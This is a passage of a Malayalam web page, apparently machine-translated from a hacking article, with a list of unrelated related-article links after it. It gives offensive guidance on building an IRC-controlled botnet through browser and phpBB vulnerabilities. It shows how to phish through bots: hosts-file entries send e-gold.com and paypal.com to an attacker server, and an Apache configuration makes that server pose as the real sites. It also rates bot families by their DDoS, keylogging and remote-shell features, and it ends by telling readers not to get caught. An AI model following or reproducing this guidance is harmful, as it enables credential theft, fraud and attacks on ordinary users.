ഈ സൃഷ്ടിയിൽ മികച്ച ജോലി ചെയ്യുന്നു. ബഗ്ട്രാക്ക് ഇന്റർനെറ്റ് എക്സ്പ്ലോററിലെ ഗുരുതരമായ കേടുപാടുകളുടെ രേഖകൾ കൊണ്ട് നിറഞ്ഞിരിക്കുന്നു, അതിനാൽ ഞങ്ങളുടെ നിയന്ത്രണത്തിലുള്ള വിൻഡോസ് സിസ്റ്റങ്ങളിൽ ഒരു ബോട്ട്നെറ്റും ഉണ്ടാകും (അതിന്റെ ഗുണങ്ങൾ ഞാൻ മുകളിൽ സൂചിപ്പിച്ചു). അത്രയേയുള്ളൂ, ഞങ്ങളുടെ സെർച്ച് വേം ഒരു ഹൈ-സ്പീഡ് ഷെല്ലിൽ പ്രവർത്തിപ്പിക്കുക, കോഫി (ബിയർ, വോഡ്ക, തക്കാളി ജ്യൂസ്) കുടിക്കുക, ബോട്ട് പ്രോപ്പർട്ടികളിൽ വ്യക്തമാക്കിയ IRC ചാനലിൽ പോയി നിങ്ങളുടെ കീഴുദ്യോഗസ്ഥരുടെ എണ്ണം കാണുക. ഉപസംഹാരമായി, എന്നെ അറിയുന്ന എല്ലാവരോടും ഞാൻ ഹലോ പറയുകയും നിങ്ങൾക്ക് ആശംസകൾ നേരുകയും ചെയ്യുന്നു. പിടിക്കപ്പെടരുത്.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

phpBB-യിലെ കേടുപാടുകൾ പതിപ്പ് 2.0.16 വരെ പ്രസക്തമാണ്, എന്നിരുന്നാലും ഡവലപ്പർമാർ അത് 2.0.11-ൽ പരിഹരിച്ചതായി അവകാശപ്പെടുന്നു.

http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

ഫിഷിംഗ്
ഒരു ഫിഷിംഗ് ഓർഗനൈസേഷനായി ബോട്ടുകൾ ഉപയോഗിക്കുന്നത് വളരെ സൗകര്യപ്രദമാണ്. ഇത് ചെയ്യുന്നതിന്, ഞങ്ങൾക്ക് ആവശ്യമുള്ള സൈറ്റും നല്ല ഹോസ്റ്റിംഗും, ഒരു സമർപ്പിത സെർവർ അല്ലെങ്കിൽ VDS എന്നിവ അനുകരിക്കുന്ന ഫിഷിംഗിനായി മൂർച്ചയുള്ള പ്രത്യേക പേജുകൾ ആവശ്യമാണ്. അത്തരം പേജുകൾ സ്വയം നിർമ്മിക്കാം, വാങ്ങാം, നെറ്റിൽ കണ്ടെത്താം. തിരഞ്ഞെടുപ്പ് വളരെ വലുതാണ്. മിക്കപ്പോഴും, ഫിഷിംഗ് സൈറ്റുകളിലാണ് സംഘടിപ്പിക്കുന്നത്: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om എന്നിവയും മറ്റുള്ളവയും, ഇ-കൊമേഴ്‌സുമായി ബന്ധിപ്പിച്ചിരിക്കുന്ന ഒരു വഴി അല്ലെങ്കിൽ മറ്റൊന്ന്. അടുത്തതായി, വിൻഡോസ് ബോട്ട് \system32\drivers\etc\hosts ഫയലിലേക്ക് നിങ്ങളുടെ സെർവറിന്റെ ip വിലാസം ചേർക്കുകയും നിങ്ങൾക്ക് ആവശ്യമുള്ള സൈറ്റിന് ഒരു അപരനാമം നൽകുകയും ചെയ്യുന്നു. ഫയൽ ഫോർമാറ്റ് ഇതാണ്:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

അതായത്, ബ്രൗസറിൽ e-gold.com, paypal.com എന്നീ സൈറ്റുകൾ ടൈപ്പ് ചെയ്യുന്നതിലൂടെ, ഉപയോക്താവിന് ഒന്നും സംശയിക്കാതെ ഞങ്ങളുടെ സെർവറിലേക്ക് എത്തുന്നു. ഫിഷറിന്റെ സെർവറിൽ, അനുബന്ധ ഡൊമെയ്‌നുകളെക്കുറിച്ചുള്ള എൻട്രികൾ httpd.conf-ലേക്ക് ചേർക്കുന്നു.

DocumentRoot "/home/e-gold.com/www" ServerName "www.e-gold.com" ServerAlias ​​"e-gold.com" "www.e-gold.com"

തീർച്ചയായും, ബ്രൗസർ ലൈനിൽ പരിചിതമായ e-gold.com വിലാസം ഉണ്ടാകും, കൂടാതെ ഒരു നൂതന ഉപയോക്താവ് പോലും ഒന്നും സംശയിക്കാതെ സൈറ്റിലേക്ക് ലോഗിൻ ചെയ്യും. ചിത്രം പൂർത്തിയാക്കാൻ, ഉപയോക്താവ് ഒരു പ്രോക്സി സെർവർ ഉപയോഗിക്കുകയാണെങ്കിൽ, ഈ രീതി പ്രവർത്തിക്കില്ലെന്ന് ഞാൻ പറയും

ഓരോ രുചിക്കും ബോട്ടുകൾ
Agobot/Phatbot/Forbot/XtremBot
ബോട്ടുകളുടെ ഏറ്റവും മികച്ച കുടുംബമാണിത്. C++ ൽ എഴുതിയിരിക്കുന്നു. അവയ്ക്ക് ധാരാളം ആന്റി-ഡിറ്റക്ഷൻ ഫീച്ചറുകളും 500-ലധികം പരിഷ്‌ക്കരണങ്ങളും ഉണ്ട്.
SDBot/RBot/UrBot/UrXBot
DDOS ആക്രമണങ്ങൾ നടത്തുന്നതിനുള്ള ബോട്ടുകൾ ഇപ്പോൾ വളരെ ജനപ്രിയമാണ്. അവർക്ക് നിരവധി അധിക സവിശേഷതകൾ ഉണ്ട്. Sock4 തുറക്കൽ, കീലോഗർ, ഓട്ടോമാറ്റിക് സ്കാനർ lsass, dcom കേടുപാടുകൾ എന്നിവ പോലെ. ആന്റി-വൈറസ് കമ്പനികളുടെ സൈറ്റുകളിലേക്കുള്ള അഭ്യർത്ഥനകൾ \system32\drivers\etc\hosts എഡിറ്റ് ചെയ്തും പോർട്ട് 80-ൽ ഒരു ചെറിയ വ്യാജ വെബ് സെർവർ ഇൻസ്റ്റാൾ ചെയ്തും ലോക്കൽ സെർവറിലേക്ക് റീഡയറക്‌ട് ചെയ്യുന്ന പ്രവർത്തനവും ഇതിന് ഉണ്ട്.
DSNX ബോട്ടുകൾ
ഈ ബോട്ടിന് DDOS ആക്രമണങ്ങളും പോർട്ട് സ്കാനുകളും മറ്റ് ചില ചെറിയ കാര്യങ്ങളും നടത്താൻ കഴിയും.
Q8 ബോട്ടുകൾ
നിക്സ് സിസ്റ്റങ്ങൾക്കുള്ള മികച്ച ബോട്ട്. കോം‌പാക്റ്റ് കോഡും (27 Kb, ഒരു ഫയൽ ഉൾക്കൊള്ളുന്നു) നല്ല പ്രവർത്തനവും കൊണ്ട് ഇത് വേർതിരിച്ചിരിക്കുന്നു. ഒരു പുതിയ ഫയൽ ഡൗൺലോഡ് ചെയ്‌ത് പ്രവർത്തിപ്പിക്കുന്നതിലൂടെ ചലനാത്മകമായി അപ്‌ഡേറ്റ് ചെയ്യാൻ കഴിയും. DDOS (SYN-flood, UDP-flood) ന്റെ പ്രധാന നിർവ്വഹണങ്ങൾ നന്നായി നടപ്പിലാക്കുന്നു. സിസ്റ്റം കമാൻഡുകൾ എക്സിക്യൂട്ട് ചെയ്യാൻ കഴിയും. ഇത് സിസ്റ്റത്തിൽ നന്നായി മറയ്ക്കുകയും ചെയ്യുന്നു.
കൈറ്റൻ
Unix/Linux സിസ്റ്റങ്ങൾക്കുള്ള നല്ലൊരു ബോട്ടും. ക്യാപ്‌ചർ ചെയ്‌ത സെർവറിൽ റിമോട്ട് ഷെൽ തുറക്കാൻ കഴിയും.
പേൾ അടിസ്ഥാനമാക്കിയുള്ള ബോട്ടുകൾ
പേളിൽ എഴുതിയ വളരെ ചെറിയ ബോട്ടുകളാണിവ. Unix-അധിഷ്ഠിത സിസ്റ്റങ്ങളിൽ DDOS ആക്രമണങ്ങൾക്കായി ഉപയോഗിക്കുന്നു.

---
ലേഖനത്തിന് ഹാക്കിംഗിനോട് വലിയ പക്ഷപാതമുണ്ട്, അതിനാൽ ഇത് വ്യക്തമല്ല - ചോദിക്കുക.

അനുബന്ധ ലേഖനങ്ങൾ

ഓഫീസ് x എൽ ഡൗൺലോഡ് ചെയ്യുക. xls ഫയൽ എങ്ങനെ തുറക്കാം? മികച്ച പ്രോഗ്രാമുകളുടെ അവലോകനം! മെറ്റീരിയൽ തരത്തിനായി ഉപയോഗിക്കുന്ന ഫോർമുലകളും ഫംഗ്ഷനുകളും
മൾട്ടിമീഡിയ

ഓഫീസ് x എൽ ഡൗൺലോഡ് ചെയ്യുക. xls ഫയൽ എങ്ങനെ തുറക്കാം? മികച്ച പ്രോഗ്രാമുകളുടെ അവലോകനം! മെറ്റീരിയൽ തരത്തിനായി ഉപയോഗിക്കുന്ന ഫോർമുലകളും ഫംഗ്ഷനുകളും

ഭൗമശാസ്ത്ര ഗവേഷണത്തിനും മോഡലിങ്ങിനുമുള്ള വൈവിധ്യമാർന്ന കമ്പ്യൂട്ടർ പ്രോഗ്രാമുകൾ
കോർപ്സ്

ഭൗമശാസ്ത്ര ഗവേഷണത്തിനും മോഡലിങ്ങിനുമുള്ള വൈവിധ്യമാർന്ന കമ്പ്യൂട്ടർ പ്രോഗ്രാമുകൾ

Abbyy Finereader ഫൈൻ റീഡർ പാരാമീറ്ററിൽ ഒരു സ്കാനർ തിരഞ്ഞെടുക്കുന്നത് തെറ്റായി സജ്ജീകരിച്ചിരിക്കുന്നു
ഇന്റർനെറ്റ്

Abbyy Finereader ഫൈൻ റീഡർ പാരാമീറ്ററിൽ ഒരു സ്കാനർ തിരഞ്ഞെടുക്കുന്നത് തെറ്റായി സജ്ജീകരിച്ചിരിക്കുന്നു

Ao റൂട്ട് അഴുകുന്നു. ഇലക്ട്രോണിക് ഒപ്പ്. ലളിതമായ ഇലക്ട്രോണിക് ഒപ്പ്
മദർബോർഡുകൾ

Ao റൂട്ട് അഴുകുന്നു. ഇലക്ട്രോണിക് ഒപ്പ്. ലളിതമായ ഇലക്ട്രോണിക് ഒപ്പ്

രജിസ്ട്രിയിലെ ക്രിപ്‌റ്റോപ്രോ 3.6 കീ. പിന്തുണയ്ക്കുന്ന UNIX പോലുള്ള ഓപ്പറേറ്റിംഗ് സിസ്റ്റങ്ങൾ
സുരക്ഷ

രജിസ്ട്രിയിലെ ക്രിപ്‌റ്റോപ്രോ 3.6 കീ. പിന്തുണയ്ക്കുന്ന UNIX പോലുള്ള ഓപ്പറേറ്റിംഗ് സിസ്റ്റങ്ങൾ

CryptoPro സീരിയൽ നമ്പർ എങ്ങനെ നൽകാം - കോണ്ടൂർ
വിൻഡോസ് 7

CryptoPro സീരിയൽ നമ്പർ എങ്ങനെ നൽകാം - കോണ്ടൂർ

നികുതി സർട്ടിഫിക്കറ്റ് എങ്ങനെ പരിശോധിക്കാം
വീഡിയോ കാർഡുകൾ

നികുതി സർട്ടിഫിക്കറ്റ് എങ്ങനെ പരിശോധിക്കാം

ആഭ്യന്തര ഡാറ്റ എൻക്രിപ്ഷൻ സ്റ്റാൻഡേർഡ്
പവർ സപ്ലൈസ്

ആഭ്യന്തര ഡാറ്റ എൻക്രിപ്ഷൻ സ്റ്റാൻഡേർഡ്

(EDS) പൊതു സേവനങ്ങൾ, സൃഷ്ടിക്കൽ, രസീത് എന്നിവയ്ക്കുള്ള ഇലക്ട്രോണിക് ഒപ്പ്
വിൻഡോസ് 8

(EDS) പൊതു സേവനങ്ങൾ, സൃഷ്ടിക്കൽ, രസീത് എന്നിവയ്ക്കുള്ള ഇലക്ട്രോണിക് ഒപ്പ്